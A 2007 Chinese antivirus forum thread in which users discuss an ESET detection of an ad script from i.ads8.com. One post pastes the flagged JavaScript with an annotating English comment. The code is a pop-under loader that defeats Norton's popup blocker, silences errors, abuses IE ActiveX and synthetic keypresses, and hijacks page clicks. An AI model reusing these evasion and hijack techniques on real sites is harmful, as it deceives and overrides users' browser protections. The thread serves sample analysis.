[病毒样本] 搜游戏,中病毒……ess报!

傻猪猪米走鸡
发表于 2007-4-15 16:17:33 | 显示全部楼层 |阅读模式
难得有心情想下载个《天旋地转3》来玩玩,结果没上去就报毒了。
http://www.chuansuo.net/58/51/07/9020/
ESS值得骄傲!

报告内容:
2007-4-15 16:11:12
ePfw-Http
file http://i.ads8.com/pds_k/view.php?id=1996&uid=18581&rePlace=0&visits=1&a_width=0&a_height=0&a_class=9&a_pic_url=&ed_str=http://www.chuansuo.net/58/51/07/9020/&ed_ads_open_class=0&ed_ads_logo=0&ed_ads_tempstop=&ed_ads_webtest=0&ed_ads_group= JS/TrojanDownloader.IstBar.G trojan
connection terminated
金剑
发表于 2007-4-15 16:18:43 | 显示全部楼层
// ===========================================================================
// NOTE(review): this is the malware sample the thread is about, pasted by a
// forum user (the ESET report above names it JS/TrojanDownloader.IstBar.G and
// says it came from http://i.ads8.com/pds_k/view.php?id=1996&uid=18581...).
// DO NOT RUN. The paste is not a complete or syntactically valid script: the
// forum stripped the HTML markup out of the string literals (note the empty
// document.write('') calls and the string cut at the line break right after
// `innerHTML='`), and the original line breaks were collapsed, so on the first
// line everything after the run of slashes -- and, at the very end, the `}`
// that closes `if(totmp!=1){` -- now sits inside a `//` comment. Read it as an
// analysis aid, not as runnable code.
//
// What the visible code does (a pop-under ad loader with popup-blocker evasion):
//  * click_string is hex-encoded ASCII; decoded it reads
//    "18581,1996,1176626223,http://www.chuansuo.net/58/51/07/9020/,9,0,0,0",
//    i.e. the uid / id from the view.php URL in the report (AdsID='1996'
//    below), what looks like a Unix timestamp (it falls on 2007-04-15) and
//    the referring page. ads_click_test is a 32-hex-digit value, presumably a
//    server-side MD5 over that string -- not verifiable from here.
//  * paypopupURL = blankurl + "/pds_k/click.php?click_string=...&ads_click_test=..."
//    is the target of every open(); all open() calls use the window name
//    'abcdefg', showActiveX() blurs the new window and every path calls
//    self.focus(), so the window lands behind the page.
//  * window.onerror = blockError (returns true) silences script-error dialogs.
//  * If a popup blocker hooked window.open and kept the original as
//    window.SymRealWinOpen (Norton, per the author's own comment) or
//    window.NS_ActualOpen (presumably another blocker), the hook is undone.
//  * version(): user-agent sniffing. "SV1" (as far as the string goes, the
//    token IE6 on Windows XP SP2 adds) together with MSIE/Microsoft and not
//    Opera selects the ActiveX path; SV1, Opera or Firefox selects the click
//    path; anything else gets a plain window.open() in paypopup().
//  * ActiveX path (setupActiveX / tryActiveX / openActiveX / showActiveX):
//    creates an IE-only window.createPopup() window and writes into it and
//    into an iframe (popIframe -- the markup it writes is the stripped part),
//    then reaches a window reference via <elem>.object.parentWindow of an
//    element inside that document ('getParentDiv' or 'getParentFrame') and
//    calls myWindow.open() on THAT window, i.e. in a context the blocker did
//    not patch. openActiveX() additionally fires a synthetic onkeypress on an
//    element 'autoHit' (keyCode derived from randkey, which is hard-coded '0'
//    here), presumably so the open counts as user-initiated. Every step
//    retries through setTimeout(string) up to MAX_TRIED (20) times, then
//    falls back to the click path. detectGoogle() looks for an element named
//    'detectGoogle' -- from the name, a Google Toolbar check; its markup is
//    stripped too.
//  * Click path (setupClick / gopop): replaces document.onclick so the first
//    click anywhere on the page opens the pop-under, then chains the previous
//    handler (prePaypopOnclick).
//  * setupActiveX(); loadingPop(); self.focus(); at the end kick all of this
//    off at load time; totmp is hard-coded 0, so the if(totmp!=1) guard is
//    always taken. ed_ads_open_class and AdsID are assigned without var
//    (implicit globals); myurl is computed but not used afterwards.
//  * Caveat for the "false positive?" debate below: nothing in the pasted code
//    itself downloads or executes a binary. Whatever click.php or the stripped
//    markup served is not part of this sample, so the "TrojanDownloader"
//    classification cannot be confirmed or refuted from this text alone; the
//    popup-blocker evasion, error suppression and onclick hijack are visible.
// IOCs visible in this sample: i.ads8.com, www.ads8.com, /pds_k/view.php,
// /pds_k/click.php, window name 'abcdefg', element ids autoHit, getParentDiv,
// getParentFrame, objectRemover, detectGoogle.
// ===========================================================================
var click_string='31383538312c313939362c313137363632363232332c687474703a2f2f7777772e636875616e73756f2e6e65742f35382f35312f30372f393032302f2c392c302c302c30'; var blankurl='http://i.ads8.com/'; var ads_click_test='8251a88654a70a482182533e40e4754b'; ed_ads_open_class='0'; AdsID='1996'; var totmp=0; if(totmp!=1){ //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// var paypopupURL = ""+blankurl+"/pds_k/click.php?click_string="+click_string+"&ads_click_test=8251a88654a70a482182533e40e4754b"; var usingActiveX = true; function blockError(){return true;} window.onerror = blockError; //bypass norton internet security popup blocker if (window.SymRealWinOpen){window.open = SymRealWinOpen;} if (window.NS_ActualOpen) {window.open = NS_ActualOpen;} if (typeof(usingClick) == 'undefined') {var usingClick = false;} if (typeof(usingActiveX) == 'undefined') {var usingActiveX = false;} if (typeof(popwin) == 'undefined') {var popwin = null;} if (typeof(poped) == 'undefined') {var poped = false;} if (typeof(paypopupURL) == 'undefined') {var paypopupURL = "http://www.ads8.com";} var blk = 1; var setupClickSuccess = false; var googleInUse = false; var myurl = location.href+'/'; var MAX_TRIED = 20; var activeXTried = false; var tried = 0; var randkey = '0'; // random key from server var myWindow; var popWindow; var setupActiveXSuccess = 0; // bypass IE functions function setupActiveX() {if (usingActiveX) {try{if (setupActiveXSuccess < 5) {document.write('');popWindow=window.createPopup();popWindow.document.body.innerHTML='
';document.write('');popIframe.document.write('');setupActiveXSuccess = 6;}}catch(e){if (setupActiveXSuccess < 5) {setupActiveXSuccess++;setTimeout('setupActiveX();',500);}else if (setupActiveXSuccess == 5) {activeXTried = true;setupClick();}}}} function tryActiveX(){if (!activeXTried && !poped) {if (setupActiveXSuccess == 6 && googleInUse && popWindow && popWindow.document.getElementById('getParentDiv') && popWindow.document.getElementById('getParentDiv').object && popWindow.document.getElementById('getParentDiv').object.parentWindow) {myWindow=popWindow.document.getElementById('getParentDiv').object.parentWindow;}else if (setupActiveXSuccess == 6 && !googleInUse && popIframe && popIframe.getParentFrame && popIframe.getParentFrame.object && popIframe.getParentFrame.object.parentWindow){myWindow=popIframe.getParentFrame.object.parentWindow;popIframe.location.replace('about:blank');}else {setTimeout('tryActiveX()',200);tried++;if (tried >= MAX_TRIED && !activeXTried) {activeXTried = true;setupClick();}return;}openActiveX();window.windowFired=true;self.focus();}} function openActiveX(){if (!activeXTried && !poped) {if (myWindow && window.windowFired){window.windowFired=false;document.getElementById('autoHit').fireEvent("onkeypress",(document.createEventObject().keyCode=escape(randkey).substring(1)));}else {setTimeout('openActiveX();',100);}tried++;if (tried >= MAX_TRIED) {activeXTried = true;setupClick();}}} function showActiveX(){if (!activeXTried && !poped) {if (googleInUse) {window.daChildObject=popWindow.document.getElementById('objectRemover').children(0);window.daChildObject=popWindow.document.getElementById('objectRemover').removeChild(window.daChildObject);}newWindow=myWindow.open(paypopupURL,'abcdefg');if (newWindow) {newWindow.blur();self.focus();activeXTried = true;poped = true;}else {if (!googleInUse) {googleInUse=true;tried=0;tryActiveX();}else {activeXTried = true;setupClick();}}}} // end bypass IE functions // normal call functions function 
paypopup(){if (!poped) {if(!usingClick && !usingActiveX) {popwin = window.open(paypopupURL,'abcdefg');if (popwin) {poped = true;}self.focus();}}if (!poped) {if (usingActiveX) {tryActiveX();}else {setupClick();}}} // end normal call functions // onclick call functions function setupClick() {if (!poped && !setupClickSuccess){if (window.Event) document.captureEvents(Event.CLICK);prePaypopOnclick = document.onclick;document.onclick = gopop;self.focus();setupClickSuccess=true;}} function gopop() {if (!poped) {popwin = window.open(paypopupURL,'abcdefg');if (popwin) {poped = true;}self.focus();}if (typeof(prePaypopOnclick) == "function") {prePaypopOnclick();}} // end onclick call functions // check version function detectGoogle() {if (usingActiveX) {try {document.write('

');googleInUse|=(typeof(document.getElementById('detectGoogle'))=='object');}catch(e){setTimeout('detectGoogle();',50);}}} function version() {var os = 'W0';var bs = 'I0';var isframe = false;var browser = window.navigator.userAgent;if (browser.indexOf('Win') != -1) {os = 'W1';}if (browser.indexOf("SV1") != -1) {bs = 'I2';}else if (browser.indexOf("Opera") != -1) {bs = "I0";}else if (browser.indexOf("Firefox") != -1) {bs = "I0";}else if (browser.indexOf("Microsoft") != -1 || browser.indexOf("MSIE") != -1) {bs = 'I1';}if (top.location != this.location) {isframe = true;}paypopupURL = paypopupURL;usingClick = blk && ((browser.indexOf("SV1") != -1) || (browser.indexOf("Opera") != -1) || (browser.indexOf("Firefox") != -1));usingActiveX = blk && (browser.indexOf("SV1") != -1) && !(browser.indexOf("Opera") != -1) && ((browser.indexOf("Microsoft") != -1) || (browser.indexOf("MSIE") != -1));detectGoogle();} version(); // end check version function loadingPop() { if(!usingClick && !usingActiveX) { paypopup(); } else if (usingActiveX) {tryActiveX();} else {setupClick();} } myurl = myurl.substring(0, myurl.indexOf('/',8)); if (myurl == '') {myurl = '.';} setupActiveX(); loadingPop(); self.focus(); //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// //document.writeln(" "); } //document.writeln(""); //document.writeln("");
金剑
发表于 2007-4-15 16:19:01 | 显示全部楼层
好像是误报
mofunzone
发表于 2007-4-15 16:25:17 | 显示全部楼层
ess的误报值得骄傲
The EQs
发表于 2007-4-15 17:05:21 | 显示全部楼层
avira的误报那才叫做爽。。。。。系统文件稍微加壳就给你杀壳了。。。哈哈
mofunzone
发表于 2007-4-15 17:20:01 | 显示全部楼层
原帖由 EQ2 于 2007-4-15 01:05 发表
avira的误报那才叫做爽。。。。。系统文件稍微加壳就给你杀壳了。。。哈哈

可惜的是没有正常系统文件加壳的
The EQs
发表于 2007-4-15 17:22:27 | 显示全部楼层

回复 #6 mofunzone 的帖子

你确定????UPX和ASPACK不是正常的加壳工具??搞笑了。。。
KAV-Longhorn
发表于 2007-4-15 17:49:12 | 显示全部楼层
那EQ兄你就给系统的explorer.exe加个UPX,再发上来给我测试一下看看吧
zzh161
发表于 2007-4-15 18:27:47 | 显示全部楼层
打开这个页面费尔就报广告程序
jy416
发表于 2007-4-15 19:08:31 | 显示全部楼层
ESS在样本区表现不好啊!